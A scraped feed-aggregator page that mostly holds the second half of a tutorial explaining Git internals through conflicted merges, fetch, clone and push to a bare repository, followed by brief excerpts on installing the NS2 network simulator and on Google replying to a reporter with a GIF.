    Graph property: it is possible to find the base commit of a merge. This means that, if a file has changed from the base in just the receiver or giver, Git can automatically resolve the merge of that file. This reduces the work the user must do.

    Fifth, the changes indicated by the entries in the diff are applied to the working copy. The content of data/letter.txt is set to b and the content of data/number.txt is set to 4.

    Sixth, the changes indicated by the entries in the diff are applied to the index. The entry for data/letter.txt is pointed at the b blob and the entry for data/number.txt is pointed at the 4 blob.

    Seventh, the updated index is committed:

    tree 20294508aea3fb6f05fcc49adaecc2e6d60f7e7d
    parent d75b9983183df12a8e745318d0c31cc1782eaf2f
    parent c6b955e6d3d26248112b29176d47b4186a9a20c8
    author Mary Rose Cook  1425596551 -0500
    committer Mary Rose Cook  1425596551 -0500
    
    b4
    

    Notice that the commit has two parents.

    Eighth, Git points the current branch, deputy, at the new commit.

    `b4`, the merge commit resulting from the recursive merge of `a4` into `b3`

    b4, the merge commit resulting from the recursive merge of a4 into b3

    Merge two commits from different lineages that both modify the same file

    ~/alpha $ printf '5' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'b5'
              [deputy 15b9e42] b5
    

    The user sets the content of data/number.txt to 5 and commits the change to deputy.

    ~/alpha $ git checkout master
              Switched to branch 'master'
    ~/alpha $ printf '6' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'b6'
              [master 6deded9] b6
    

    The user checks out master. They set the content of data/number.txt to 6 and commit the change to master.

    `b6` commit on `master`

    b6 commit on master

    ~/alpha $ git merge deputy
              CONFLICT in data/number.txt
              Automatic merge failed; fix conflicts and
              commit the result.
    

    The user merges deputy into master. There is a conflict and the merge is paused. The process for a conflicted merge follows the same first six steps as the process for an unconflicted merge: set .git/MERGE_HEAD, find the base commit, generate the indices of the base, receiver and giver commits, create a diff, update the working copy and update the index. Because of the conflict, the seventh commit step and eighth ref update step are never taken. Let’s go through the steps again and see what happens.

    First, Git writes the hash of the giver commit to a file at .git/MERGE_HEAD.

    `MERGE_HEAD` written during merge of `b5` into `b6`

    MERGE_HEAD written during merge of b5 into b6

    Second, Git finds the base commit, b4.

    Third, Git generates the indices for the base, receiver and giver commits.

    Fourth, Git creates a diff that contains the changes required to go from the receiver commit to the giver commit. In this case, the diff contains only one entry: data/number.txt. Because the content for data/number.txt is different in the receiver, giver and base, the entry is marked as a conflict.

    Fifth, the changes indicated by the entries in the diff are applied to the working copy. For a conflicted area, Git writes both versions to the file in the working copy. The content of data/number.txt is set to:

    <<<<<<>>>>>> deputy
    

    Sixth, the changes indicated by the entries in the diff are applied to the index. Entries in the index are uniquely identified by a combination of their file path and stage. The entry for an unconflicted file has a stage of 0. Before this merge, the index looked like this, where the 0s are stage values:

    0 data/letter.txt 63d8dbd40c23542e740659a7168a0ce3138ea748
    0 data/number.txt 62f9457511f879886bb7728c986fe10b0ece6bcb
    

    After the merge diff is written to the index, the index looks like this:

    0 data/letter.txt 63d8dbd40c23542e740659a7168a0ce3138ea748
    1 data/number.txt bf0d87ab1b2b0ec1a11a3973d2845b42413d9767
    2 data/number.txt 62f9457511f879886bb7728c986fe10b0ece6bcb
    3 data/number.txt 7813681f5b41c028345ca62a2be376bae70b7f61
    

    The entry for data/letter.txt at stage 0 is the same as it was before the merge. The entry for data/number.txt at stage 0 is gone. There are three new entries in its place. The entry for stage 1 has the hash of the base data/number.txt content. The entry for stage 2 has the hash of the receiver data/number.txt content. The entry for stage 3 has the hash of the giver data/number.txt content. The presence of these three entries tells Git that data/number.txt is in conflict.

    The merge pauses.

    ~/alpha $ printf '13' > data/number.txt
    ~/alpha $ git add data/number.txt
    

    The user integrates the content of the two conflicting versions by setting the content of data/number.txt to 13. They add the file to the index. Git adds a blob containing 13. Adding a conflicted file tells Git that the conflict is resolved. Git removes the data/number.txt entries for stages 1, 2 and 3 from the index. It adds an entry for data/number.txt at stage 0 with the hash of the new blob. The index now reads:

    0 data/letter.txt 63d8dbd40c23542e740659a7168a0ce3138ea748
    0 data/number.txt ca7bf83ac53a27a2a914bed25e1a07478dd8ef47
    
    ~/alpha $ git commit -m 'b13'
              [master 28118a0] b13
    

    Seventh, the user commits. Git sees .git/MERGE_HEAD in the repository, which tells it that a merge is in progress. It checks the index and finds there are no conflicts. It creates a new commit, b13, to record the content of the resolved merge. It deletes the file at .git/MERGE_HEAD. This completes the merge.

    Eighth, Git points the current branch, master, at the new commit.

    `b4`, the merge commit resulting from the conflicted, recursive merge of `b5` into `b6`

    b4, the merge commit resulting from the conflicted, recursive merge of b5 into b6

    Remove a file

    A diagram of the Git graph that includes the commit history, the trees and blobs for the latest commit, and the working copy and index:

    The working copy, index, `b13` commit and its tree graph

    The working copy, index, b13 commit and its tree graph

    ~/alpha $ git rm data/letter.txt
              rm 'data/letter.txt'
    

    The user tells Git to remove data/letter.txt. The file is deleted from the working copy. The entry is deleted from the index.

    After `data/letter.txt` `rm`ed from working copy and index

    After data/letter.txt rmed from working copy and index

    ~/alpha $ git commit -m '13'
              [master 836b25c] 13
    

    The user commits. As part of the commit, as always, Git builds a tree graph that represents the content of the index. Because data/letter.txt is not in the index, it is not included in the tree graph.

    `13` commit made after `data/letter.txt` `rm`ed

    13 commit made after data/letter.txt rmed

    Copy a repository

    ~/alpha $ cd ..
          ~ $ cp -r alpha bravo
    

    The user copies the contents of the alpha/ repository to the bravo/ directory. This produces the following directory structure:

    ~
    ├── alpha
    |   └── data
    |       └── number.txt
    └── bravo
        └── data
            └── number.txt
    

    There is now another Git graph in the bravo directory:

    New graph created when `alpha` `cp`ed to `bravo`

    New graph created when alpha cped to bravo

    Link a repository to another repository

          ~ $ cd alpha
    ~/alpha $ git remote add bravo ../bravo
    

    The user moves back into the alpha repository. They set up bravo as a remote repository on alpha. This adds some lines to the file at alpha/.git/config:

    [remote "bravo"]
        url = ../bravo/
    

    These lines specify that there is a remote repository called bravo in the directory at ../bravo.

    Fetch a branch from a remote

    ~/alpha $ cd ../bravo
    ~/bravo $ printf '14' > data/number.txt
    ~/bravo $ git add data/number.txt
    ~/bravo $ git commit -m '14'
              [master 6764cd8] 14
    

    The user goes into the bravo repository. They set the content of data/number.txt to 14 and commit the change to master on bravo.

    `14` commit on `bravo` repository

    14 commit on bravo repository

    ~/bravo $ cd ../alpha
    ~/alpha $ git fetch bravo master
              Unpacking objects: 100%
              From ../bravo
                * branch master -> FETCH_HEAD
    

    The user goes into the alpha repository. They fetch master from bravo into alpha. This process has four steps.

    First, Git gets the hash of the commit that master is pointing at on bravo. This is the hash of the 14 commit.

    Second, Git makes a list of all the objects that the 14 commit depends on: the commit object itself, the objects in its tree graph, the ancestor commits of the 14 commit and the objects in their tree graphs. It removes from this list any objects that the alpha object database already has. It copies the rest to alpha/.git/objects/.

    Third, the content of the concrete ref file at alpha/.git/refs/remotes/bravo/master is set to the hash of the 14 commit.

    Fourth, the content of alpha/.git/FETCH_HEAD is set to:

    132c6a5ba1bb9e0d89c45dc50ba4553f5edd19dc branch 'master' of ../bravo
    

    This indicates that the most recent fetch command fetched the 14 commit of master from bravo.

    `alpha` after `bravo/master` fetched

    alpha after bravo/master fetched

    Graph property: objects can be copied. This means that history can be shared between repositories.

    Graph property: a repository can store remote branch refs like alpha/.git/refs/remotes/bravo/master. This means that a repository can record locally the state of a branch on a remote repository. Though correct at the time it is fetched, it will go out of date if the remote branch changes.

    Merge FETCH_HEAD

    ~/alpha $ git merge FETCH_HEAD
              Updating 836b25c..6764cd8
              Fast-forward
    

    The user merges FETCH_HEAD. FETCH_HEAD is just another ref. It resolves to the 14 commit, the giver. HEAD points at the 13 commit, the receiver. Git does a fast-forward merge and points master at the 14 commit.

    `alpha` after `FETCH_HEAD` merged

    alpha after FETCH_HEAD merged

    Pull a branch from a remote

    ~/alpha $ git pull bravo master
              Already up-to-date.
    

    The user pulls master from bravo into alpha. Pull is shorthand for “fetch and merge FETCH_HEAD”. Git does these two commands and reports that master is Already up-to-date.

    Clone a repository

    ~/alpha $ cd ..
          ~ $ git clone alpha charlie
              Cloning into 'charlie'
    

    The user moves into the directory above. They clone alpha to charlie. Cloning to charlie has similar results to the cp the user did to produce the bravo repository. Git creates a new directory called charlie. It inits charlie as a Git repo, adds alpha as a remote called origin, fetches origin and merges FETCH_HEAD.

    Push a branch to a checked-out branch on a remote

          ~ $ cd alpha
    ~/alpha $ printf '15' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m '15'
              [master 8b35db5] 15
    

    The user goes back into the alpha repository. They set the content of data/number.txt to 15 and commit the change to master on alpha.

    ~/alpha $ git remote add charlie ../charlie
    

    They set up charlie as a remote repository on alpha.

    ~/alpha $ git push charlie master
              Writing objects: 100%
              remote error: refusing to update checked out
              branch: refs/heads/master because it will make
              the index and work tree inconsistent
    

    They push master to charlie.

    All the objects required for the 15 commit are copied to charlie.

    At this point, the push process stops. Git, as ever, tells the user what went wrong. It refuses to push to a branch that is checked out on the remote. This makes sense. A push would update the remote index and HEAD. This would cause confusion if someone were editing the working copy on the remote.

    At this point, the user could make a new branch, merge the 15 commit into it and push that branch to charlie. But, really, they want a repository that they can push to whenever they want. They want a central repository that they can push to and pull from, but that no one commits to directly. They want something like a GitHub remote. They want a bare repository.

    Clone a bare repository

    ~/alpha $ cd ..
          ~ $ git clone alpha delta --bare
              Cloning into bare repository 'delta'
    

    The user moves into the directory above. They clone delta as a bare repository. This is an ordinary clone with two differences. The config file indicates that the repository is bare. And the files that are normally stored in the .git directory are stored in the root of the repository:

    delta
    ├── HEAD
    ├── config
    ├── objects
    └── refs
    

    `alpha` and `delta` graphs after `alpha` cloned to `delta`

    alpha and delta graphs after alpha cloned to delta

    Push a branch to a bare repository

          ~ $ cd alpha
    ~/alpha $ git remote add delta ../delta
    

    The user goes back into the alpha repository. They set up delta as a remote repository on alpha.

    ~/alpha $ printf '16' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m '16'
              [master 02d1bb2] 16
    

    They set the content of data/number.txt to 16 and commit the change to master on alpha.

    `16` commit on `alpha`

    16 commit on alpha

    ~/alpha $ git push delta master
              Writing objects: 100%
              To ../delta
                8b35db5..02d1bb2 master -> master
    

    They push master to delta. Pushing has three steps.

    First, all the objects required for the 16 commit on the master branch are copied from alpha/.git/objects/ to delta/.git/objects/.

    Second, .git/refs/heads/master is updated on delta to point at the 16 commit.

    Third, alpha/.git/refs/remotes/delta/master is set to point at the 16 commit. This means alpha has an up-to-date record of the state of delta.

    `16` commit pushed from `alpha` to `delta`

    16 commit pushed from alpha to delta

    Summary

    Git is built on a graph. Almost every Git command manipulates this graph. To understand Git deeply, focus on the properties of this graph, not workflows or commands.

    To learn more about Git, investigate the .git directory. It’s not scary. Look inside. Change the content of files and see what happens. Create a commit by hand. Try and see how badly you can mess up a repo. Then repair it.


    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/puHtvtexnHI/git-from-the-inside-out

    Original article

    Installing Network Simulator 2 (NS2) on Ubuntu 14.04

    Network simulators are tools used to simulate discrete events in a network and which helps to predict the behaviours of a computer network. Generally the simulated networks have entities like links, switches, hubs, applications, etc. Once the simulation model is complete, it is executed to analyse the performance. Administrators can then customize the simulator to suit their needs. Network simulators typically come with support for the most popular protocols and networks in use today, such as WLAN,UDP,TCP,IP, WAN, etc.


    Original URL: https://www.howtoforge.com/tutorial/ns2-network-simulator-on-ubuntu-14.04/

    Original article

    Google sends reporter a GIF instead of a ‘no comment’

    Not to be all snooty about online publishing, but your newspaper can’t do this:

    This adorable animated GIF is apparently the official answer Google sent to a Daily Dot reporter in response to his seeming scoop on a new YouTube livestreaming plan. Richard Lewis reported that Google-owned YouTube was going to take a new swing at “eSports”—a.k.a. watching other people play videogames—as services like Amazon’s Twitch gain popularity.

    In an update to the story today (h/t Business Insider), Lewis wrote that a YouTube spokesperson sent him an animated GIF in response to a request for comment. He assumed it was a joke. “Earlier today, the rep assured us it was not,” Lewis said.

    “‘The GIF really was our official response,’” Lewis quotes the rep as saying.

    On the one hand, it’s fair to look back on the print-first news organizations of the 20th century and criticize them for not moving fast enough as the efficiency and reach of online publishing became apparent. On the other hand, you can’t really blame anyone twenty years ago for not anticipating that the PR shop of one of the world’s most valuable publicly traded companies would send out cute moving pictures of kids as an official response to anything.

    WIRED reached out to Google to confirm that the GIF came from them, but the company has yet to respond. If it does, I hope the reply looks something like this:

    Update (March 25, 2015, 8:30 p.m. ET): Just received this tweet from YouTube head of communications Chris Dale:

    And here’s the GIF:


    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/5Xdh_gPbWFY/

    Original article

    Proudly powered by WordPress | Theme: Baskerville 2 by Anders Noren.

    Up ↑

    %d bloggers like this: